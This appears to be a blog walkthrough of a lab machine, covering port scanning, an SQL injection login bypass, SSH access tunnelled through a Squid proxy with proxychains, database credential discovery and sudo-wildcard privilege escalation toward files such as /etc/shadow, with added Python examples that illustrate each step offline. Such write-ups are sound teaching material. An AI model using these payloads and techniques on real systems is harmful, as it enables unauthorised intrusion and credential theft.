NMAP:
In this step, from the attacker machine we gather information about the open ports and services of the target machine. Nmap's default-script and version-detection options (-sC, -sV) also report details that help identify vulnerable software on the host. The scan below is a full-port (-p -) scan with DNS resolution disabled (-n), saved to the file target_nmap:
nmap -sC -sV -p - -v -n 192.168.1.37 -oN target_nmap
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-24 18:37 CEST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 18:37
Completed NSE at 18:37, 0.00s elapsed
Initiating NSE at 18:37
Completed NSE at 18:37, 0.00s elapsed
Initiating NSE at 18:37
Completed NSE at 18:37, 0.00s elapsed
Initiating Ping Scan at 18:37
Scanning 192.168.1.37 [2 ports]
Completed Ping Scan at 18:37, 0.00s elapsed (1 total hosts)
Initiating Connect Scan at 18:37
Scanning 192.168.1.37 [65535 ports]
Discovered open port 80/tcp on 192.168.1.37
Discovered open port 3128/tcp on 192.168.1.37
Completed Connect Scan at 18:37, 2.60s elapsed (65535 total ports)
Initiating Service scan at 18:37
Scanning 2 services on 192.168.1.37
Completed Service scan at 18:37, 11.02s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.1.37.
Initiating NSE at 18:37
Completed NSE at 18:37, 20.06s elapsed
Initiating NSE at 18:37
Completed NSE at 18:37, 0.00s elapsed
Initiating NSE at 18:37
Completed NSE at 18:37, 0.00s elapsed
Nmap scan report for 192.168.1.37
Host is up (0.00079s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.2.22 ((Debian))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Site doesn't have a title (text/html).
3128/tcp open http-proxy Squid http proxy 3.1.20
|_http-server-header: squid/3.1.20
|_http-title: ERROR: The requested URL could not be retrieved
NSE: Script Post-scanning.
Initiating NSE at 18:37
Completed NSE at 18:37, 0.00s elapsed
Initiating NSE at 18:37
Completed NSE at 18:37, 0.00s elapsed
Initiating NSE at 18:37
Completed NSE at 18:37, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
The conclusion of the nmap scan: two ports are open, 80/tcp (Apache httpd 2.2.22 on Debian) and 3128/tcp (Squid 3.1.20 HTTP proxy). Port 22/tcp (SSH) is reported as filtered, which means our direct connection attempts to it get no answer at all, so something in between is dropping them.
EXPLOITATION:
80/tcp http :
Using an SQL injection payload such as ' || OR 1=1 # in the email field of the login form, we bypass the login:
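To show why the email field lets us in, here is an added example (not code from the post or from the lab's web application) that reproduces the bypass against a constructed in-memory SQLite table: the vulnerable login concatenates the field into the SQL text, the safe one binds it as a parameter. The table name, columns and users are assumptions. Note that SQLite comments start with --, not with the MySQL-style # the post's payload uses, which is also why the same payload errors out on one backend and works on the other.

```python
import sqlite3

# Constructed demo data for this illustration (not the lab's database).
USERS = [("admin@lab.test", "S3cret!"), ("john@lab.test", "hunter2")]


def make_db():
    """In-memory SQLite table shaped like a typical login table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (email TEXT, password TEXT)")
    db.executemany("INSERT INTO user VALUES (?, ?)", USERS)
    return db


def login_vulnerable(db, email, password):
    """Builds the query by string concatenation: the email field becomes SQL text."""
    sql = (f"SELECT email FROM user WHERE email = '{email}' "
           f"AND password = '{password}'")
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.OperationalError as exc:   # injected SQL the backend cannot parse
        return f"error: {exc}"
    return row[0] if row else None            # first matching row "logs in"


def login_safe(db, email, password):
    """Parameterised query: the same payload is compared as a literal string."""
    row = db.execute("SELECT email FROM user WHERE email = ? AND password = ?",
                     (email, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "' OR 1=1 -- ", "wrong"))   # admin@lab.test: logged in as the first user
    print(login_vulnerable(db, "' OR 1=1 #", "wrong"))     # error: SQLite has no '#' comment
    print(login_safe(db, "' OR 1=1 -- ", "wrong"))         # None
```

The payload ' OR 1=1 -- turns the WHERE clause into email = '' OR 1=1 followed by a comment, so the password check is never evaluated and the first row in the table is returned. The parameterised version sends the same bytes as data, and no row has that literal email.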
The bypassed login gives us a username and password, which should let us in via SSH, but where is the service? Port 22 showed as filtered in the nmap scan.
The SSH service is only reachable when the connection comes through the Squid HTTP proxy on port 3128, so the SSH client has to use that proxy as a hop. One way is to configure a local proxy chain with the proxychains tool. In the configuration below the default socks5 entry on 127.0.0.1:9050 (Tor) stays in the list; with dynamic_chain a proxy that is not listening is simply skipped, so the connection goes through the Squid proxy on the target:
Proxychain:
cat /etc/proxychains.conf | grep -v "\#"
dynamic_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5 127.0.0.1 9050
http 192.168.1.37 3128
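What proxychains does with the http entry above is a plain HTTP CONNECT exchange: it asks the proxy to open a TCP tunnel to 192.168.1.37:22 and, if the proxy answers with a 2xx status, hands the socket to the SSH client, which then sees the sshd banner. The following is an added example (not code from the post or from proxychains) that performs that exchange in Python against a fake Squid stand-in on loopback, so it runs offline; the stand-in allows CONNECT only to port 22, the way a Squid ACL would, and answers with a constructed sshd banner. The target address and port are the lab's; everything else is an assumption.

```python
import socket
import threading

# Assumed values (the lab's Squid is 192.168.1.37:3128; sshd sits behind it on 22).
LAB_SSH = ("192.168.1.37", 22)


def build_connect_request(dst_host, dst_port):
    """The request an 'http' proxy entry makes proxychains send: one CONNECT per hop."""
    target = f"{dst_host}:{dst_port}"
    return f"CONNECT {target} HTTP/1.1\r\nHost: {target}\r\n\r\n".encode()


def read_http_head(sock):
    """Read up to the blank line that ends the headers; return (head, leftover bytes)."""
    buf = b""
    while b"\r\n\r\n" not in buf:
        chunk = sock.recv(4096)
        if not chunk:
            return buf, b""
        buf += chunk
    head, rest = buf.split(b"\r\n\r\n", 1)
    return head, rest


def connect_accepted(head):
    """Any 2xx status opens the tunnel; 403 (ACL) or 407 (auth) means no tunnel."""
    parts = head.split(b"\r\n", 1)[0].split(b" ")
    return len(parts) >= 2 and parts[1].startswith(b"2")


def tunnel_through_proxy(proxy, dst, timeout=5.0):
    """Open a TCP tunnel to dst via the HTTP proxy; return (socket, bytes already received)."""
    s = socket.create_connection(proxy, timeout=timeout)
    s.sendall(build_connect_request(*dst))
    head, rest = read_http_head(s)
    if not connect_accepted(head):
        s.close()
        raise ConnectionError(head.split(b"\r\n", 1)[0].decode(errors="replace"))
    return s, rest   # from here on the bytes come from the destination (SSH banner first)


def start_fake_proxy(allowed_port=22):
    """Stand-in for Squid on loopback: allows CONNECT only to one port, like an ACL."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        req, _ = read_http_head(conn)
        target = req.split(b" ", 2)[1]                      # "host:port" from the CONNECT line
        if target.rsplit(b":", 1)[1] == str(allowed_port).encode():
            conn.sendall(b"HTTP/1.1 200 Connection established\r\n\r\n")
            conn.sendall(b"SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u1\r\n")  # constructed sshd banner
        else:
            conn.sendall(b"HTTP/1.1 403 Forbidden\r\n\r\n")
        conn.close()
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port


def first_line_via_proxy(dst_port):
    """Run the exchange against the fake proxy; return the SSH banner or the proxy's refusal."""
    proxy = ("127.0.0.1", start_fake_proxy())
    try:
        s, data = tunnel_through_proxy(proxy, (LAB_SSH[0], dst_port))
    except ConnectionError as exc:
        return str(exc)
    while b"\n" not in data:          # the banner may already be in the leftover bytes
        chunk = s.recv(1024)
        if not chunk:
            break
        data += chunk
    s.close()
    return data.decode(errors="replace").strip()


if __name__ == "__main__":
    print(first_line_via_proxy(22))   # the sshd banner: the tunnel is open
    print(first_line_via_proxy(80))   # HTTP/1.1 403 Forbidden: the ACL refused the tunnel
```

Against the real Squid, a 403 on CONNECT to a port means the proxy's ACL does not allow tunnelling there, which is exactly the check to run before assuming a service is unreachable: the first nmap scan saw port 22 as filtered from our address, while the proxy, sitting on the host itself, is allowed to reach it.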
NMAP:
Scanning all ports of the target again, this time with proxychains in front of nmap so that the probes go through the Squid proxy. Only TCP connect scans (-sT) are proxied, because proxychains works by hooking connect(); SYN scans and ICMP/ARP host discovery would bypass the proxy, so host discovery should be disabled too (-Pn). Through the proxy, port 22 now shows as open:
Nmap scan report for 192.168.1.37
Host is up (0.00068s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u1 (protocol 2.0)
| ssh-hostkey:
| 1024 4f:1e:17:00:5f:ec:28:7c:97:17:da:da:3c:b9:36:73 (DSA)
| 2048 1f:ca:22:be:83:a1:38:3f:a6:fe:bc:63:83:99:08:21 (RSA)
|_ 256 f6:3b:95:46:6e:a7:0f:72:1a:67:9e:9b:8a:48:5e:3d (ECDSA)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.12 seconds
The SSH connection has a problem: as soon as the user's session opens, a .bashrc file in the home directory closes it again. So before logging in interactively, we move that file out of the way by running a single remote command over SSH through the proxy:
proxychains ssh john@192.168.1.37 "mv /home/john/.bashrc /home/john/bashrc_backup"
And finally we get the interactive remote session:
proxychains ssh john@192.168.1.37
Using the lse.sh script (Linux Smart Enumeration), we find a MySQL server that accepts the user root with the password root:
mysql -u root -p
In the towersky database, the user table contains the user sara with the password ihatethisjob, stored in plaintext.
These credentials allow a new SSH connection through proxychains, using the same .bashrc trick on sara's home directory:
proxychains ssh sara@192.168.1.37 "mv /home/sara/.bashrc /home/sara/bashrc_backup"
proxychains ssh sara@192.168.1.37
PRIVILEGE ESCALATION:
Logged in as sara, the command sudo -l shows which binaries on the target machine sara may execute as the root user.
Two commands are allowed: ls /accounts/* and cat /accounts/*
Using the following trick, we can read the flag file and obtain the root user's credentials.
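The post does not reproduce the trick itself, so the added example below (not code from the post, and not sudo's own) only shows the general reason a sudoers rule whose argument ends in a wildcard is weak. sudoers matches command-line arguments with fnmatch(3) without FNM_PATHNAME, so * also spans / (the sudoers manual itself warns about this with a /var/log/messages* example), and it joins all arguments into one string before matching. The rule, the binaries and the paths tested are hypothetical, shaped after the sudo -l output above; the second function shows the confinement the rule author actually intended.

```python
import fnmatch
import posixpath

# Hypothetical sudoers rule shaped like the lab's "sudo -l" output (assumption):
#   sara ALL=(root) /bin/ls /accounts/*, /bin/cat /accounts/*
RULES = {
    "/bin/ls": ["/accounts/*"],
    "/bin/cat": ["/accounts/*"],
}


def sudo_allows(rules, binary, args):
    """Argument matching the way sudoers does it: all arguments are joined with
    spaces into one string and compared with fnmatch(3) without FNM_PATHNAME,
    so '*' spans '/', '..' components and even further arguments."""
    joined = " ".join(args)
    return any(fnmatch.fnmatchcase(joined, pat) for pat in rules.get(binary, []))


def confined_to(directory, path):
    """What the rule author meant: the normalised path must stay under the
    directory. This is lexical only (posixpath.normpath); on a real host use
    os.path.realpath as well so that symlinks are followed before the check."""
    resolved = posixpath.normpath(path)
    base = directory.rstrip("/")
    return resolved == base or resolved.startswith(base + "/")


if __name__ == "__main__":
    # Hypothetical paths used only to show where the glob stops confining anything.
    print(sudo_allows(RULES, "/bin/cat", ["/accounts/sara.txt"]))            # True, as intended
    print(sudo_allows(RULES, "/bin/cat", ["/accounts/../root/flag.txt"]))    # True: '*' spans '/'
    print(sudo_allows(RULES, "/bin/cat", ["/accounts/a", "/etc/shadow"]))    # True: args are joined
    print(confined_to("/accounts", "/accounts/../root/flag.txt"))            # False: what was meant
```

A rule that lists the exact files, or a wrapper script that resolves the path with realpath and refuses anything outside /accounts before calling cat, gives the behaviour that confined_to models; a trailing glob on a path argument does not.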
And that is all for this lab machine. I hope you enjoyed the Linux server, and that you'll follow my blog [https://roadtooscp-f0ns1.blogspot.com/]. We'll keep in touch.
With kind regards, f0ns1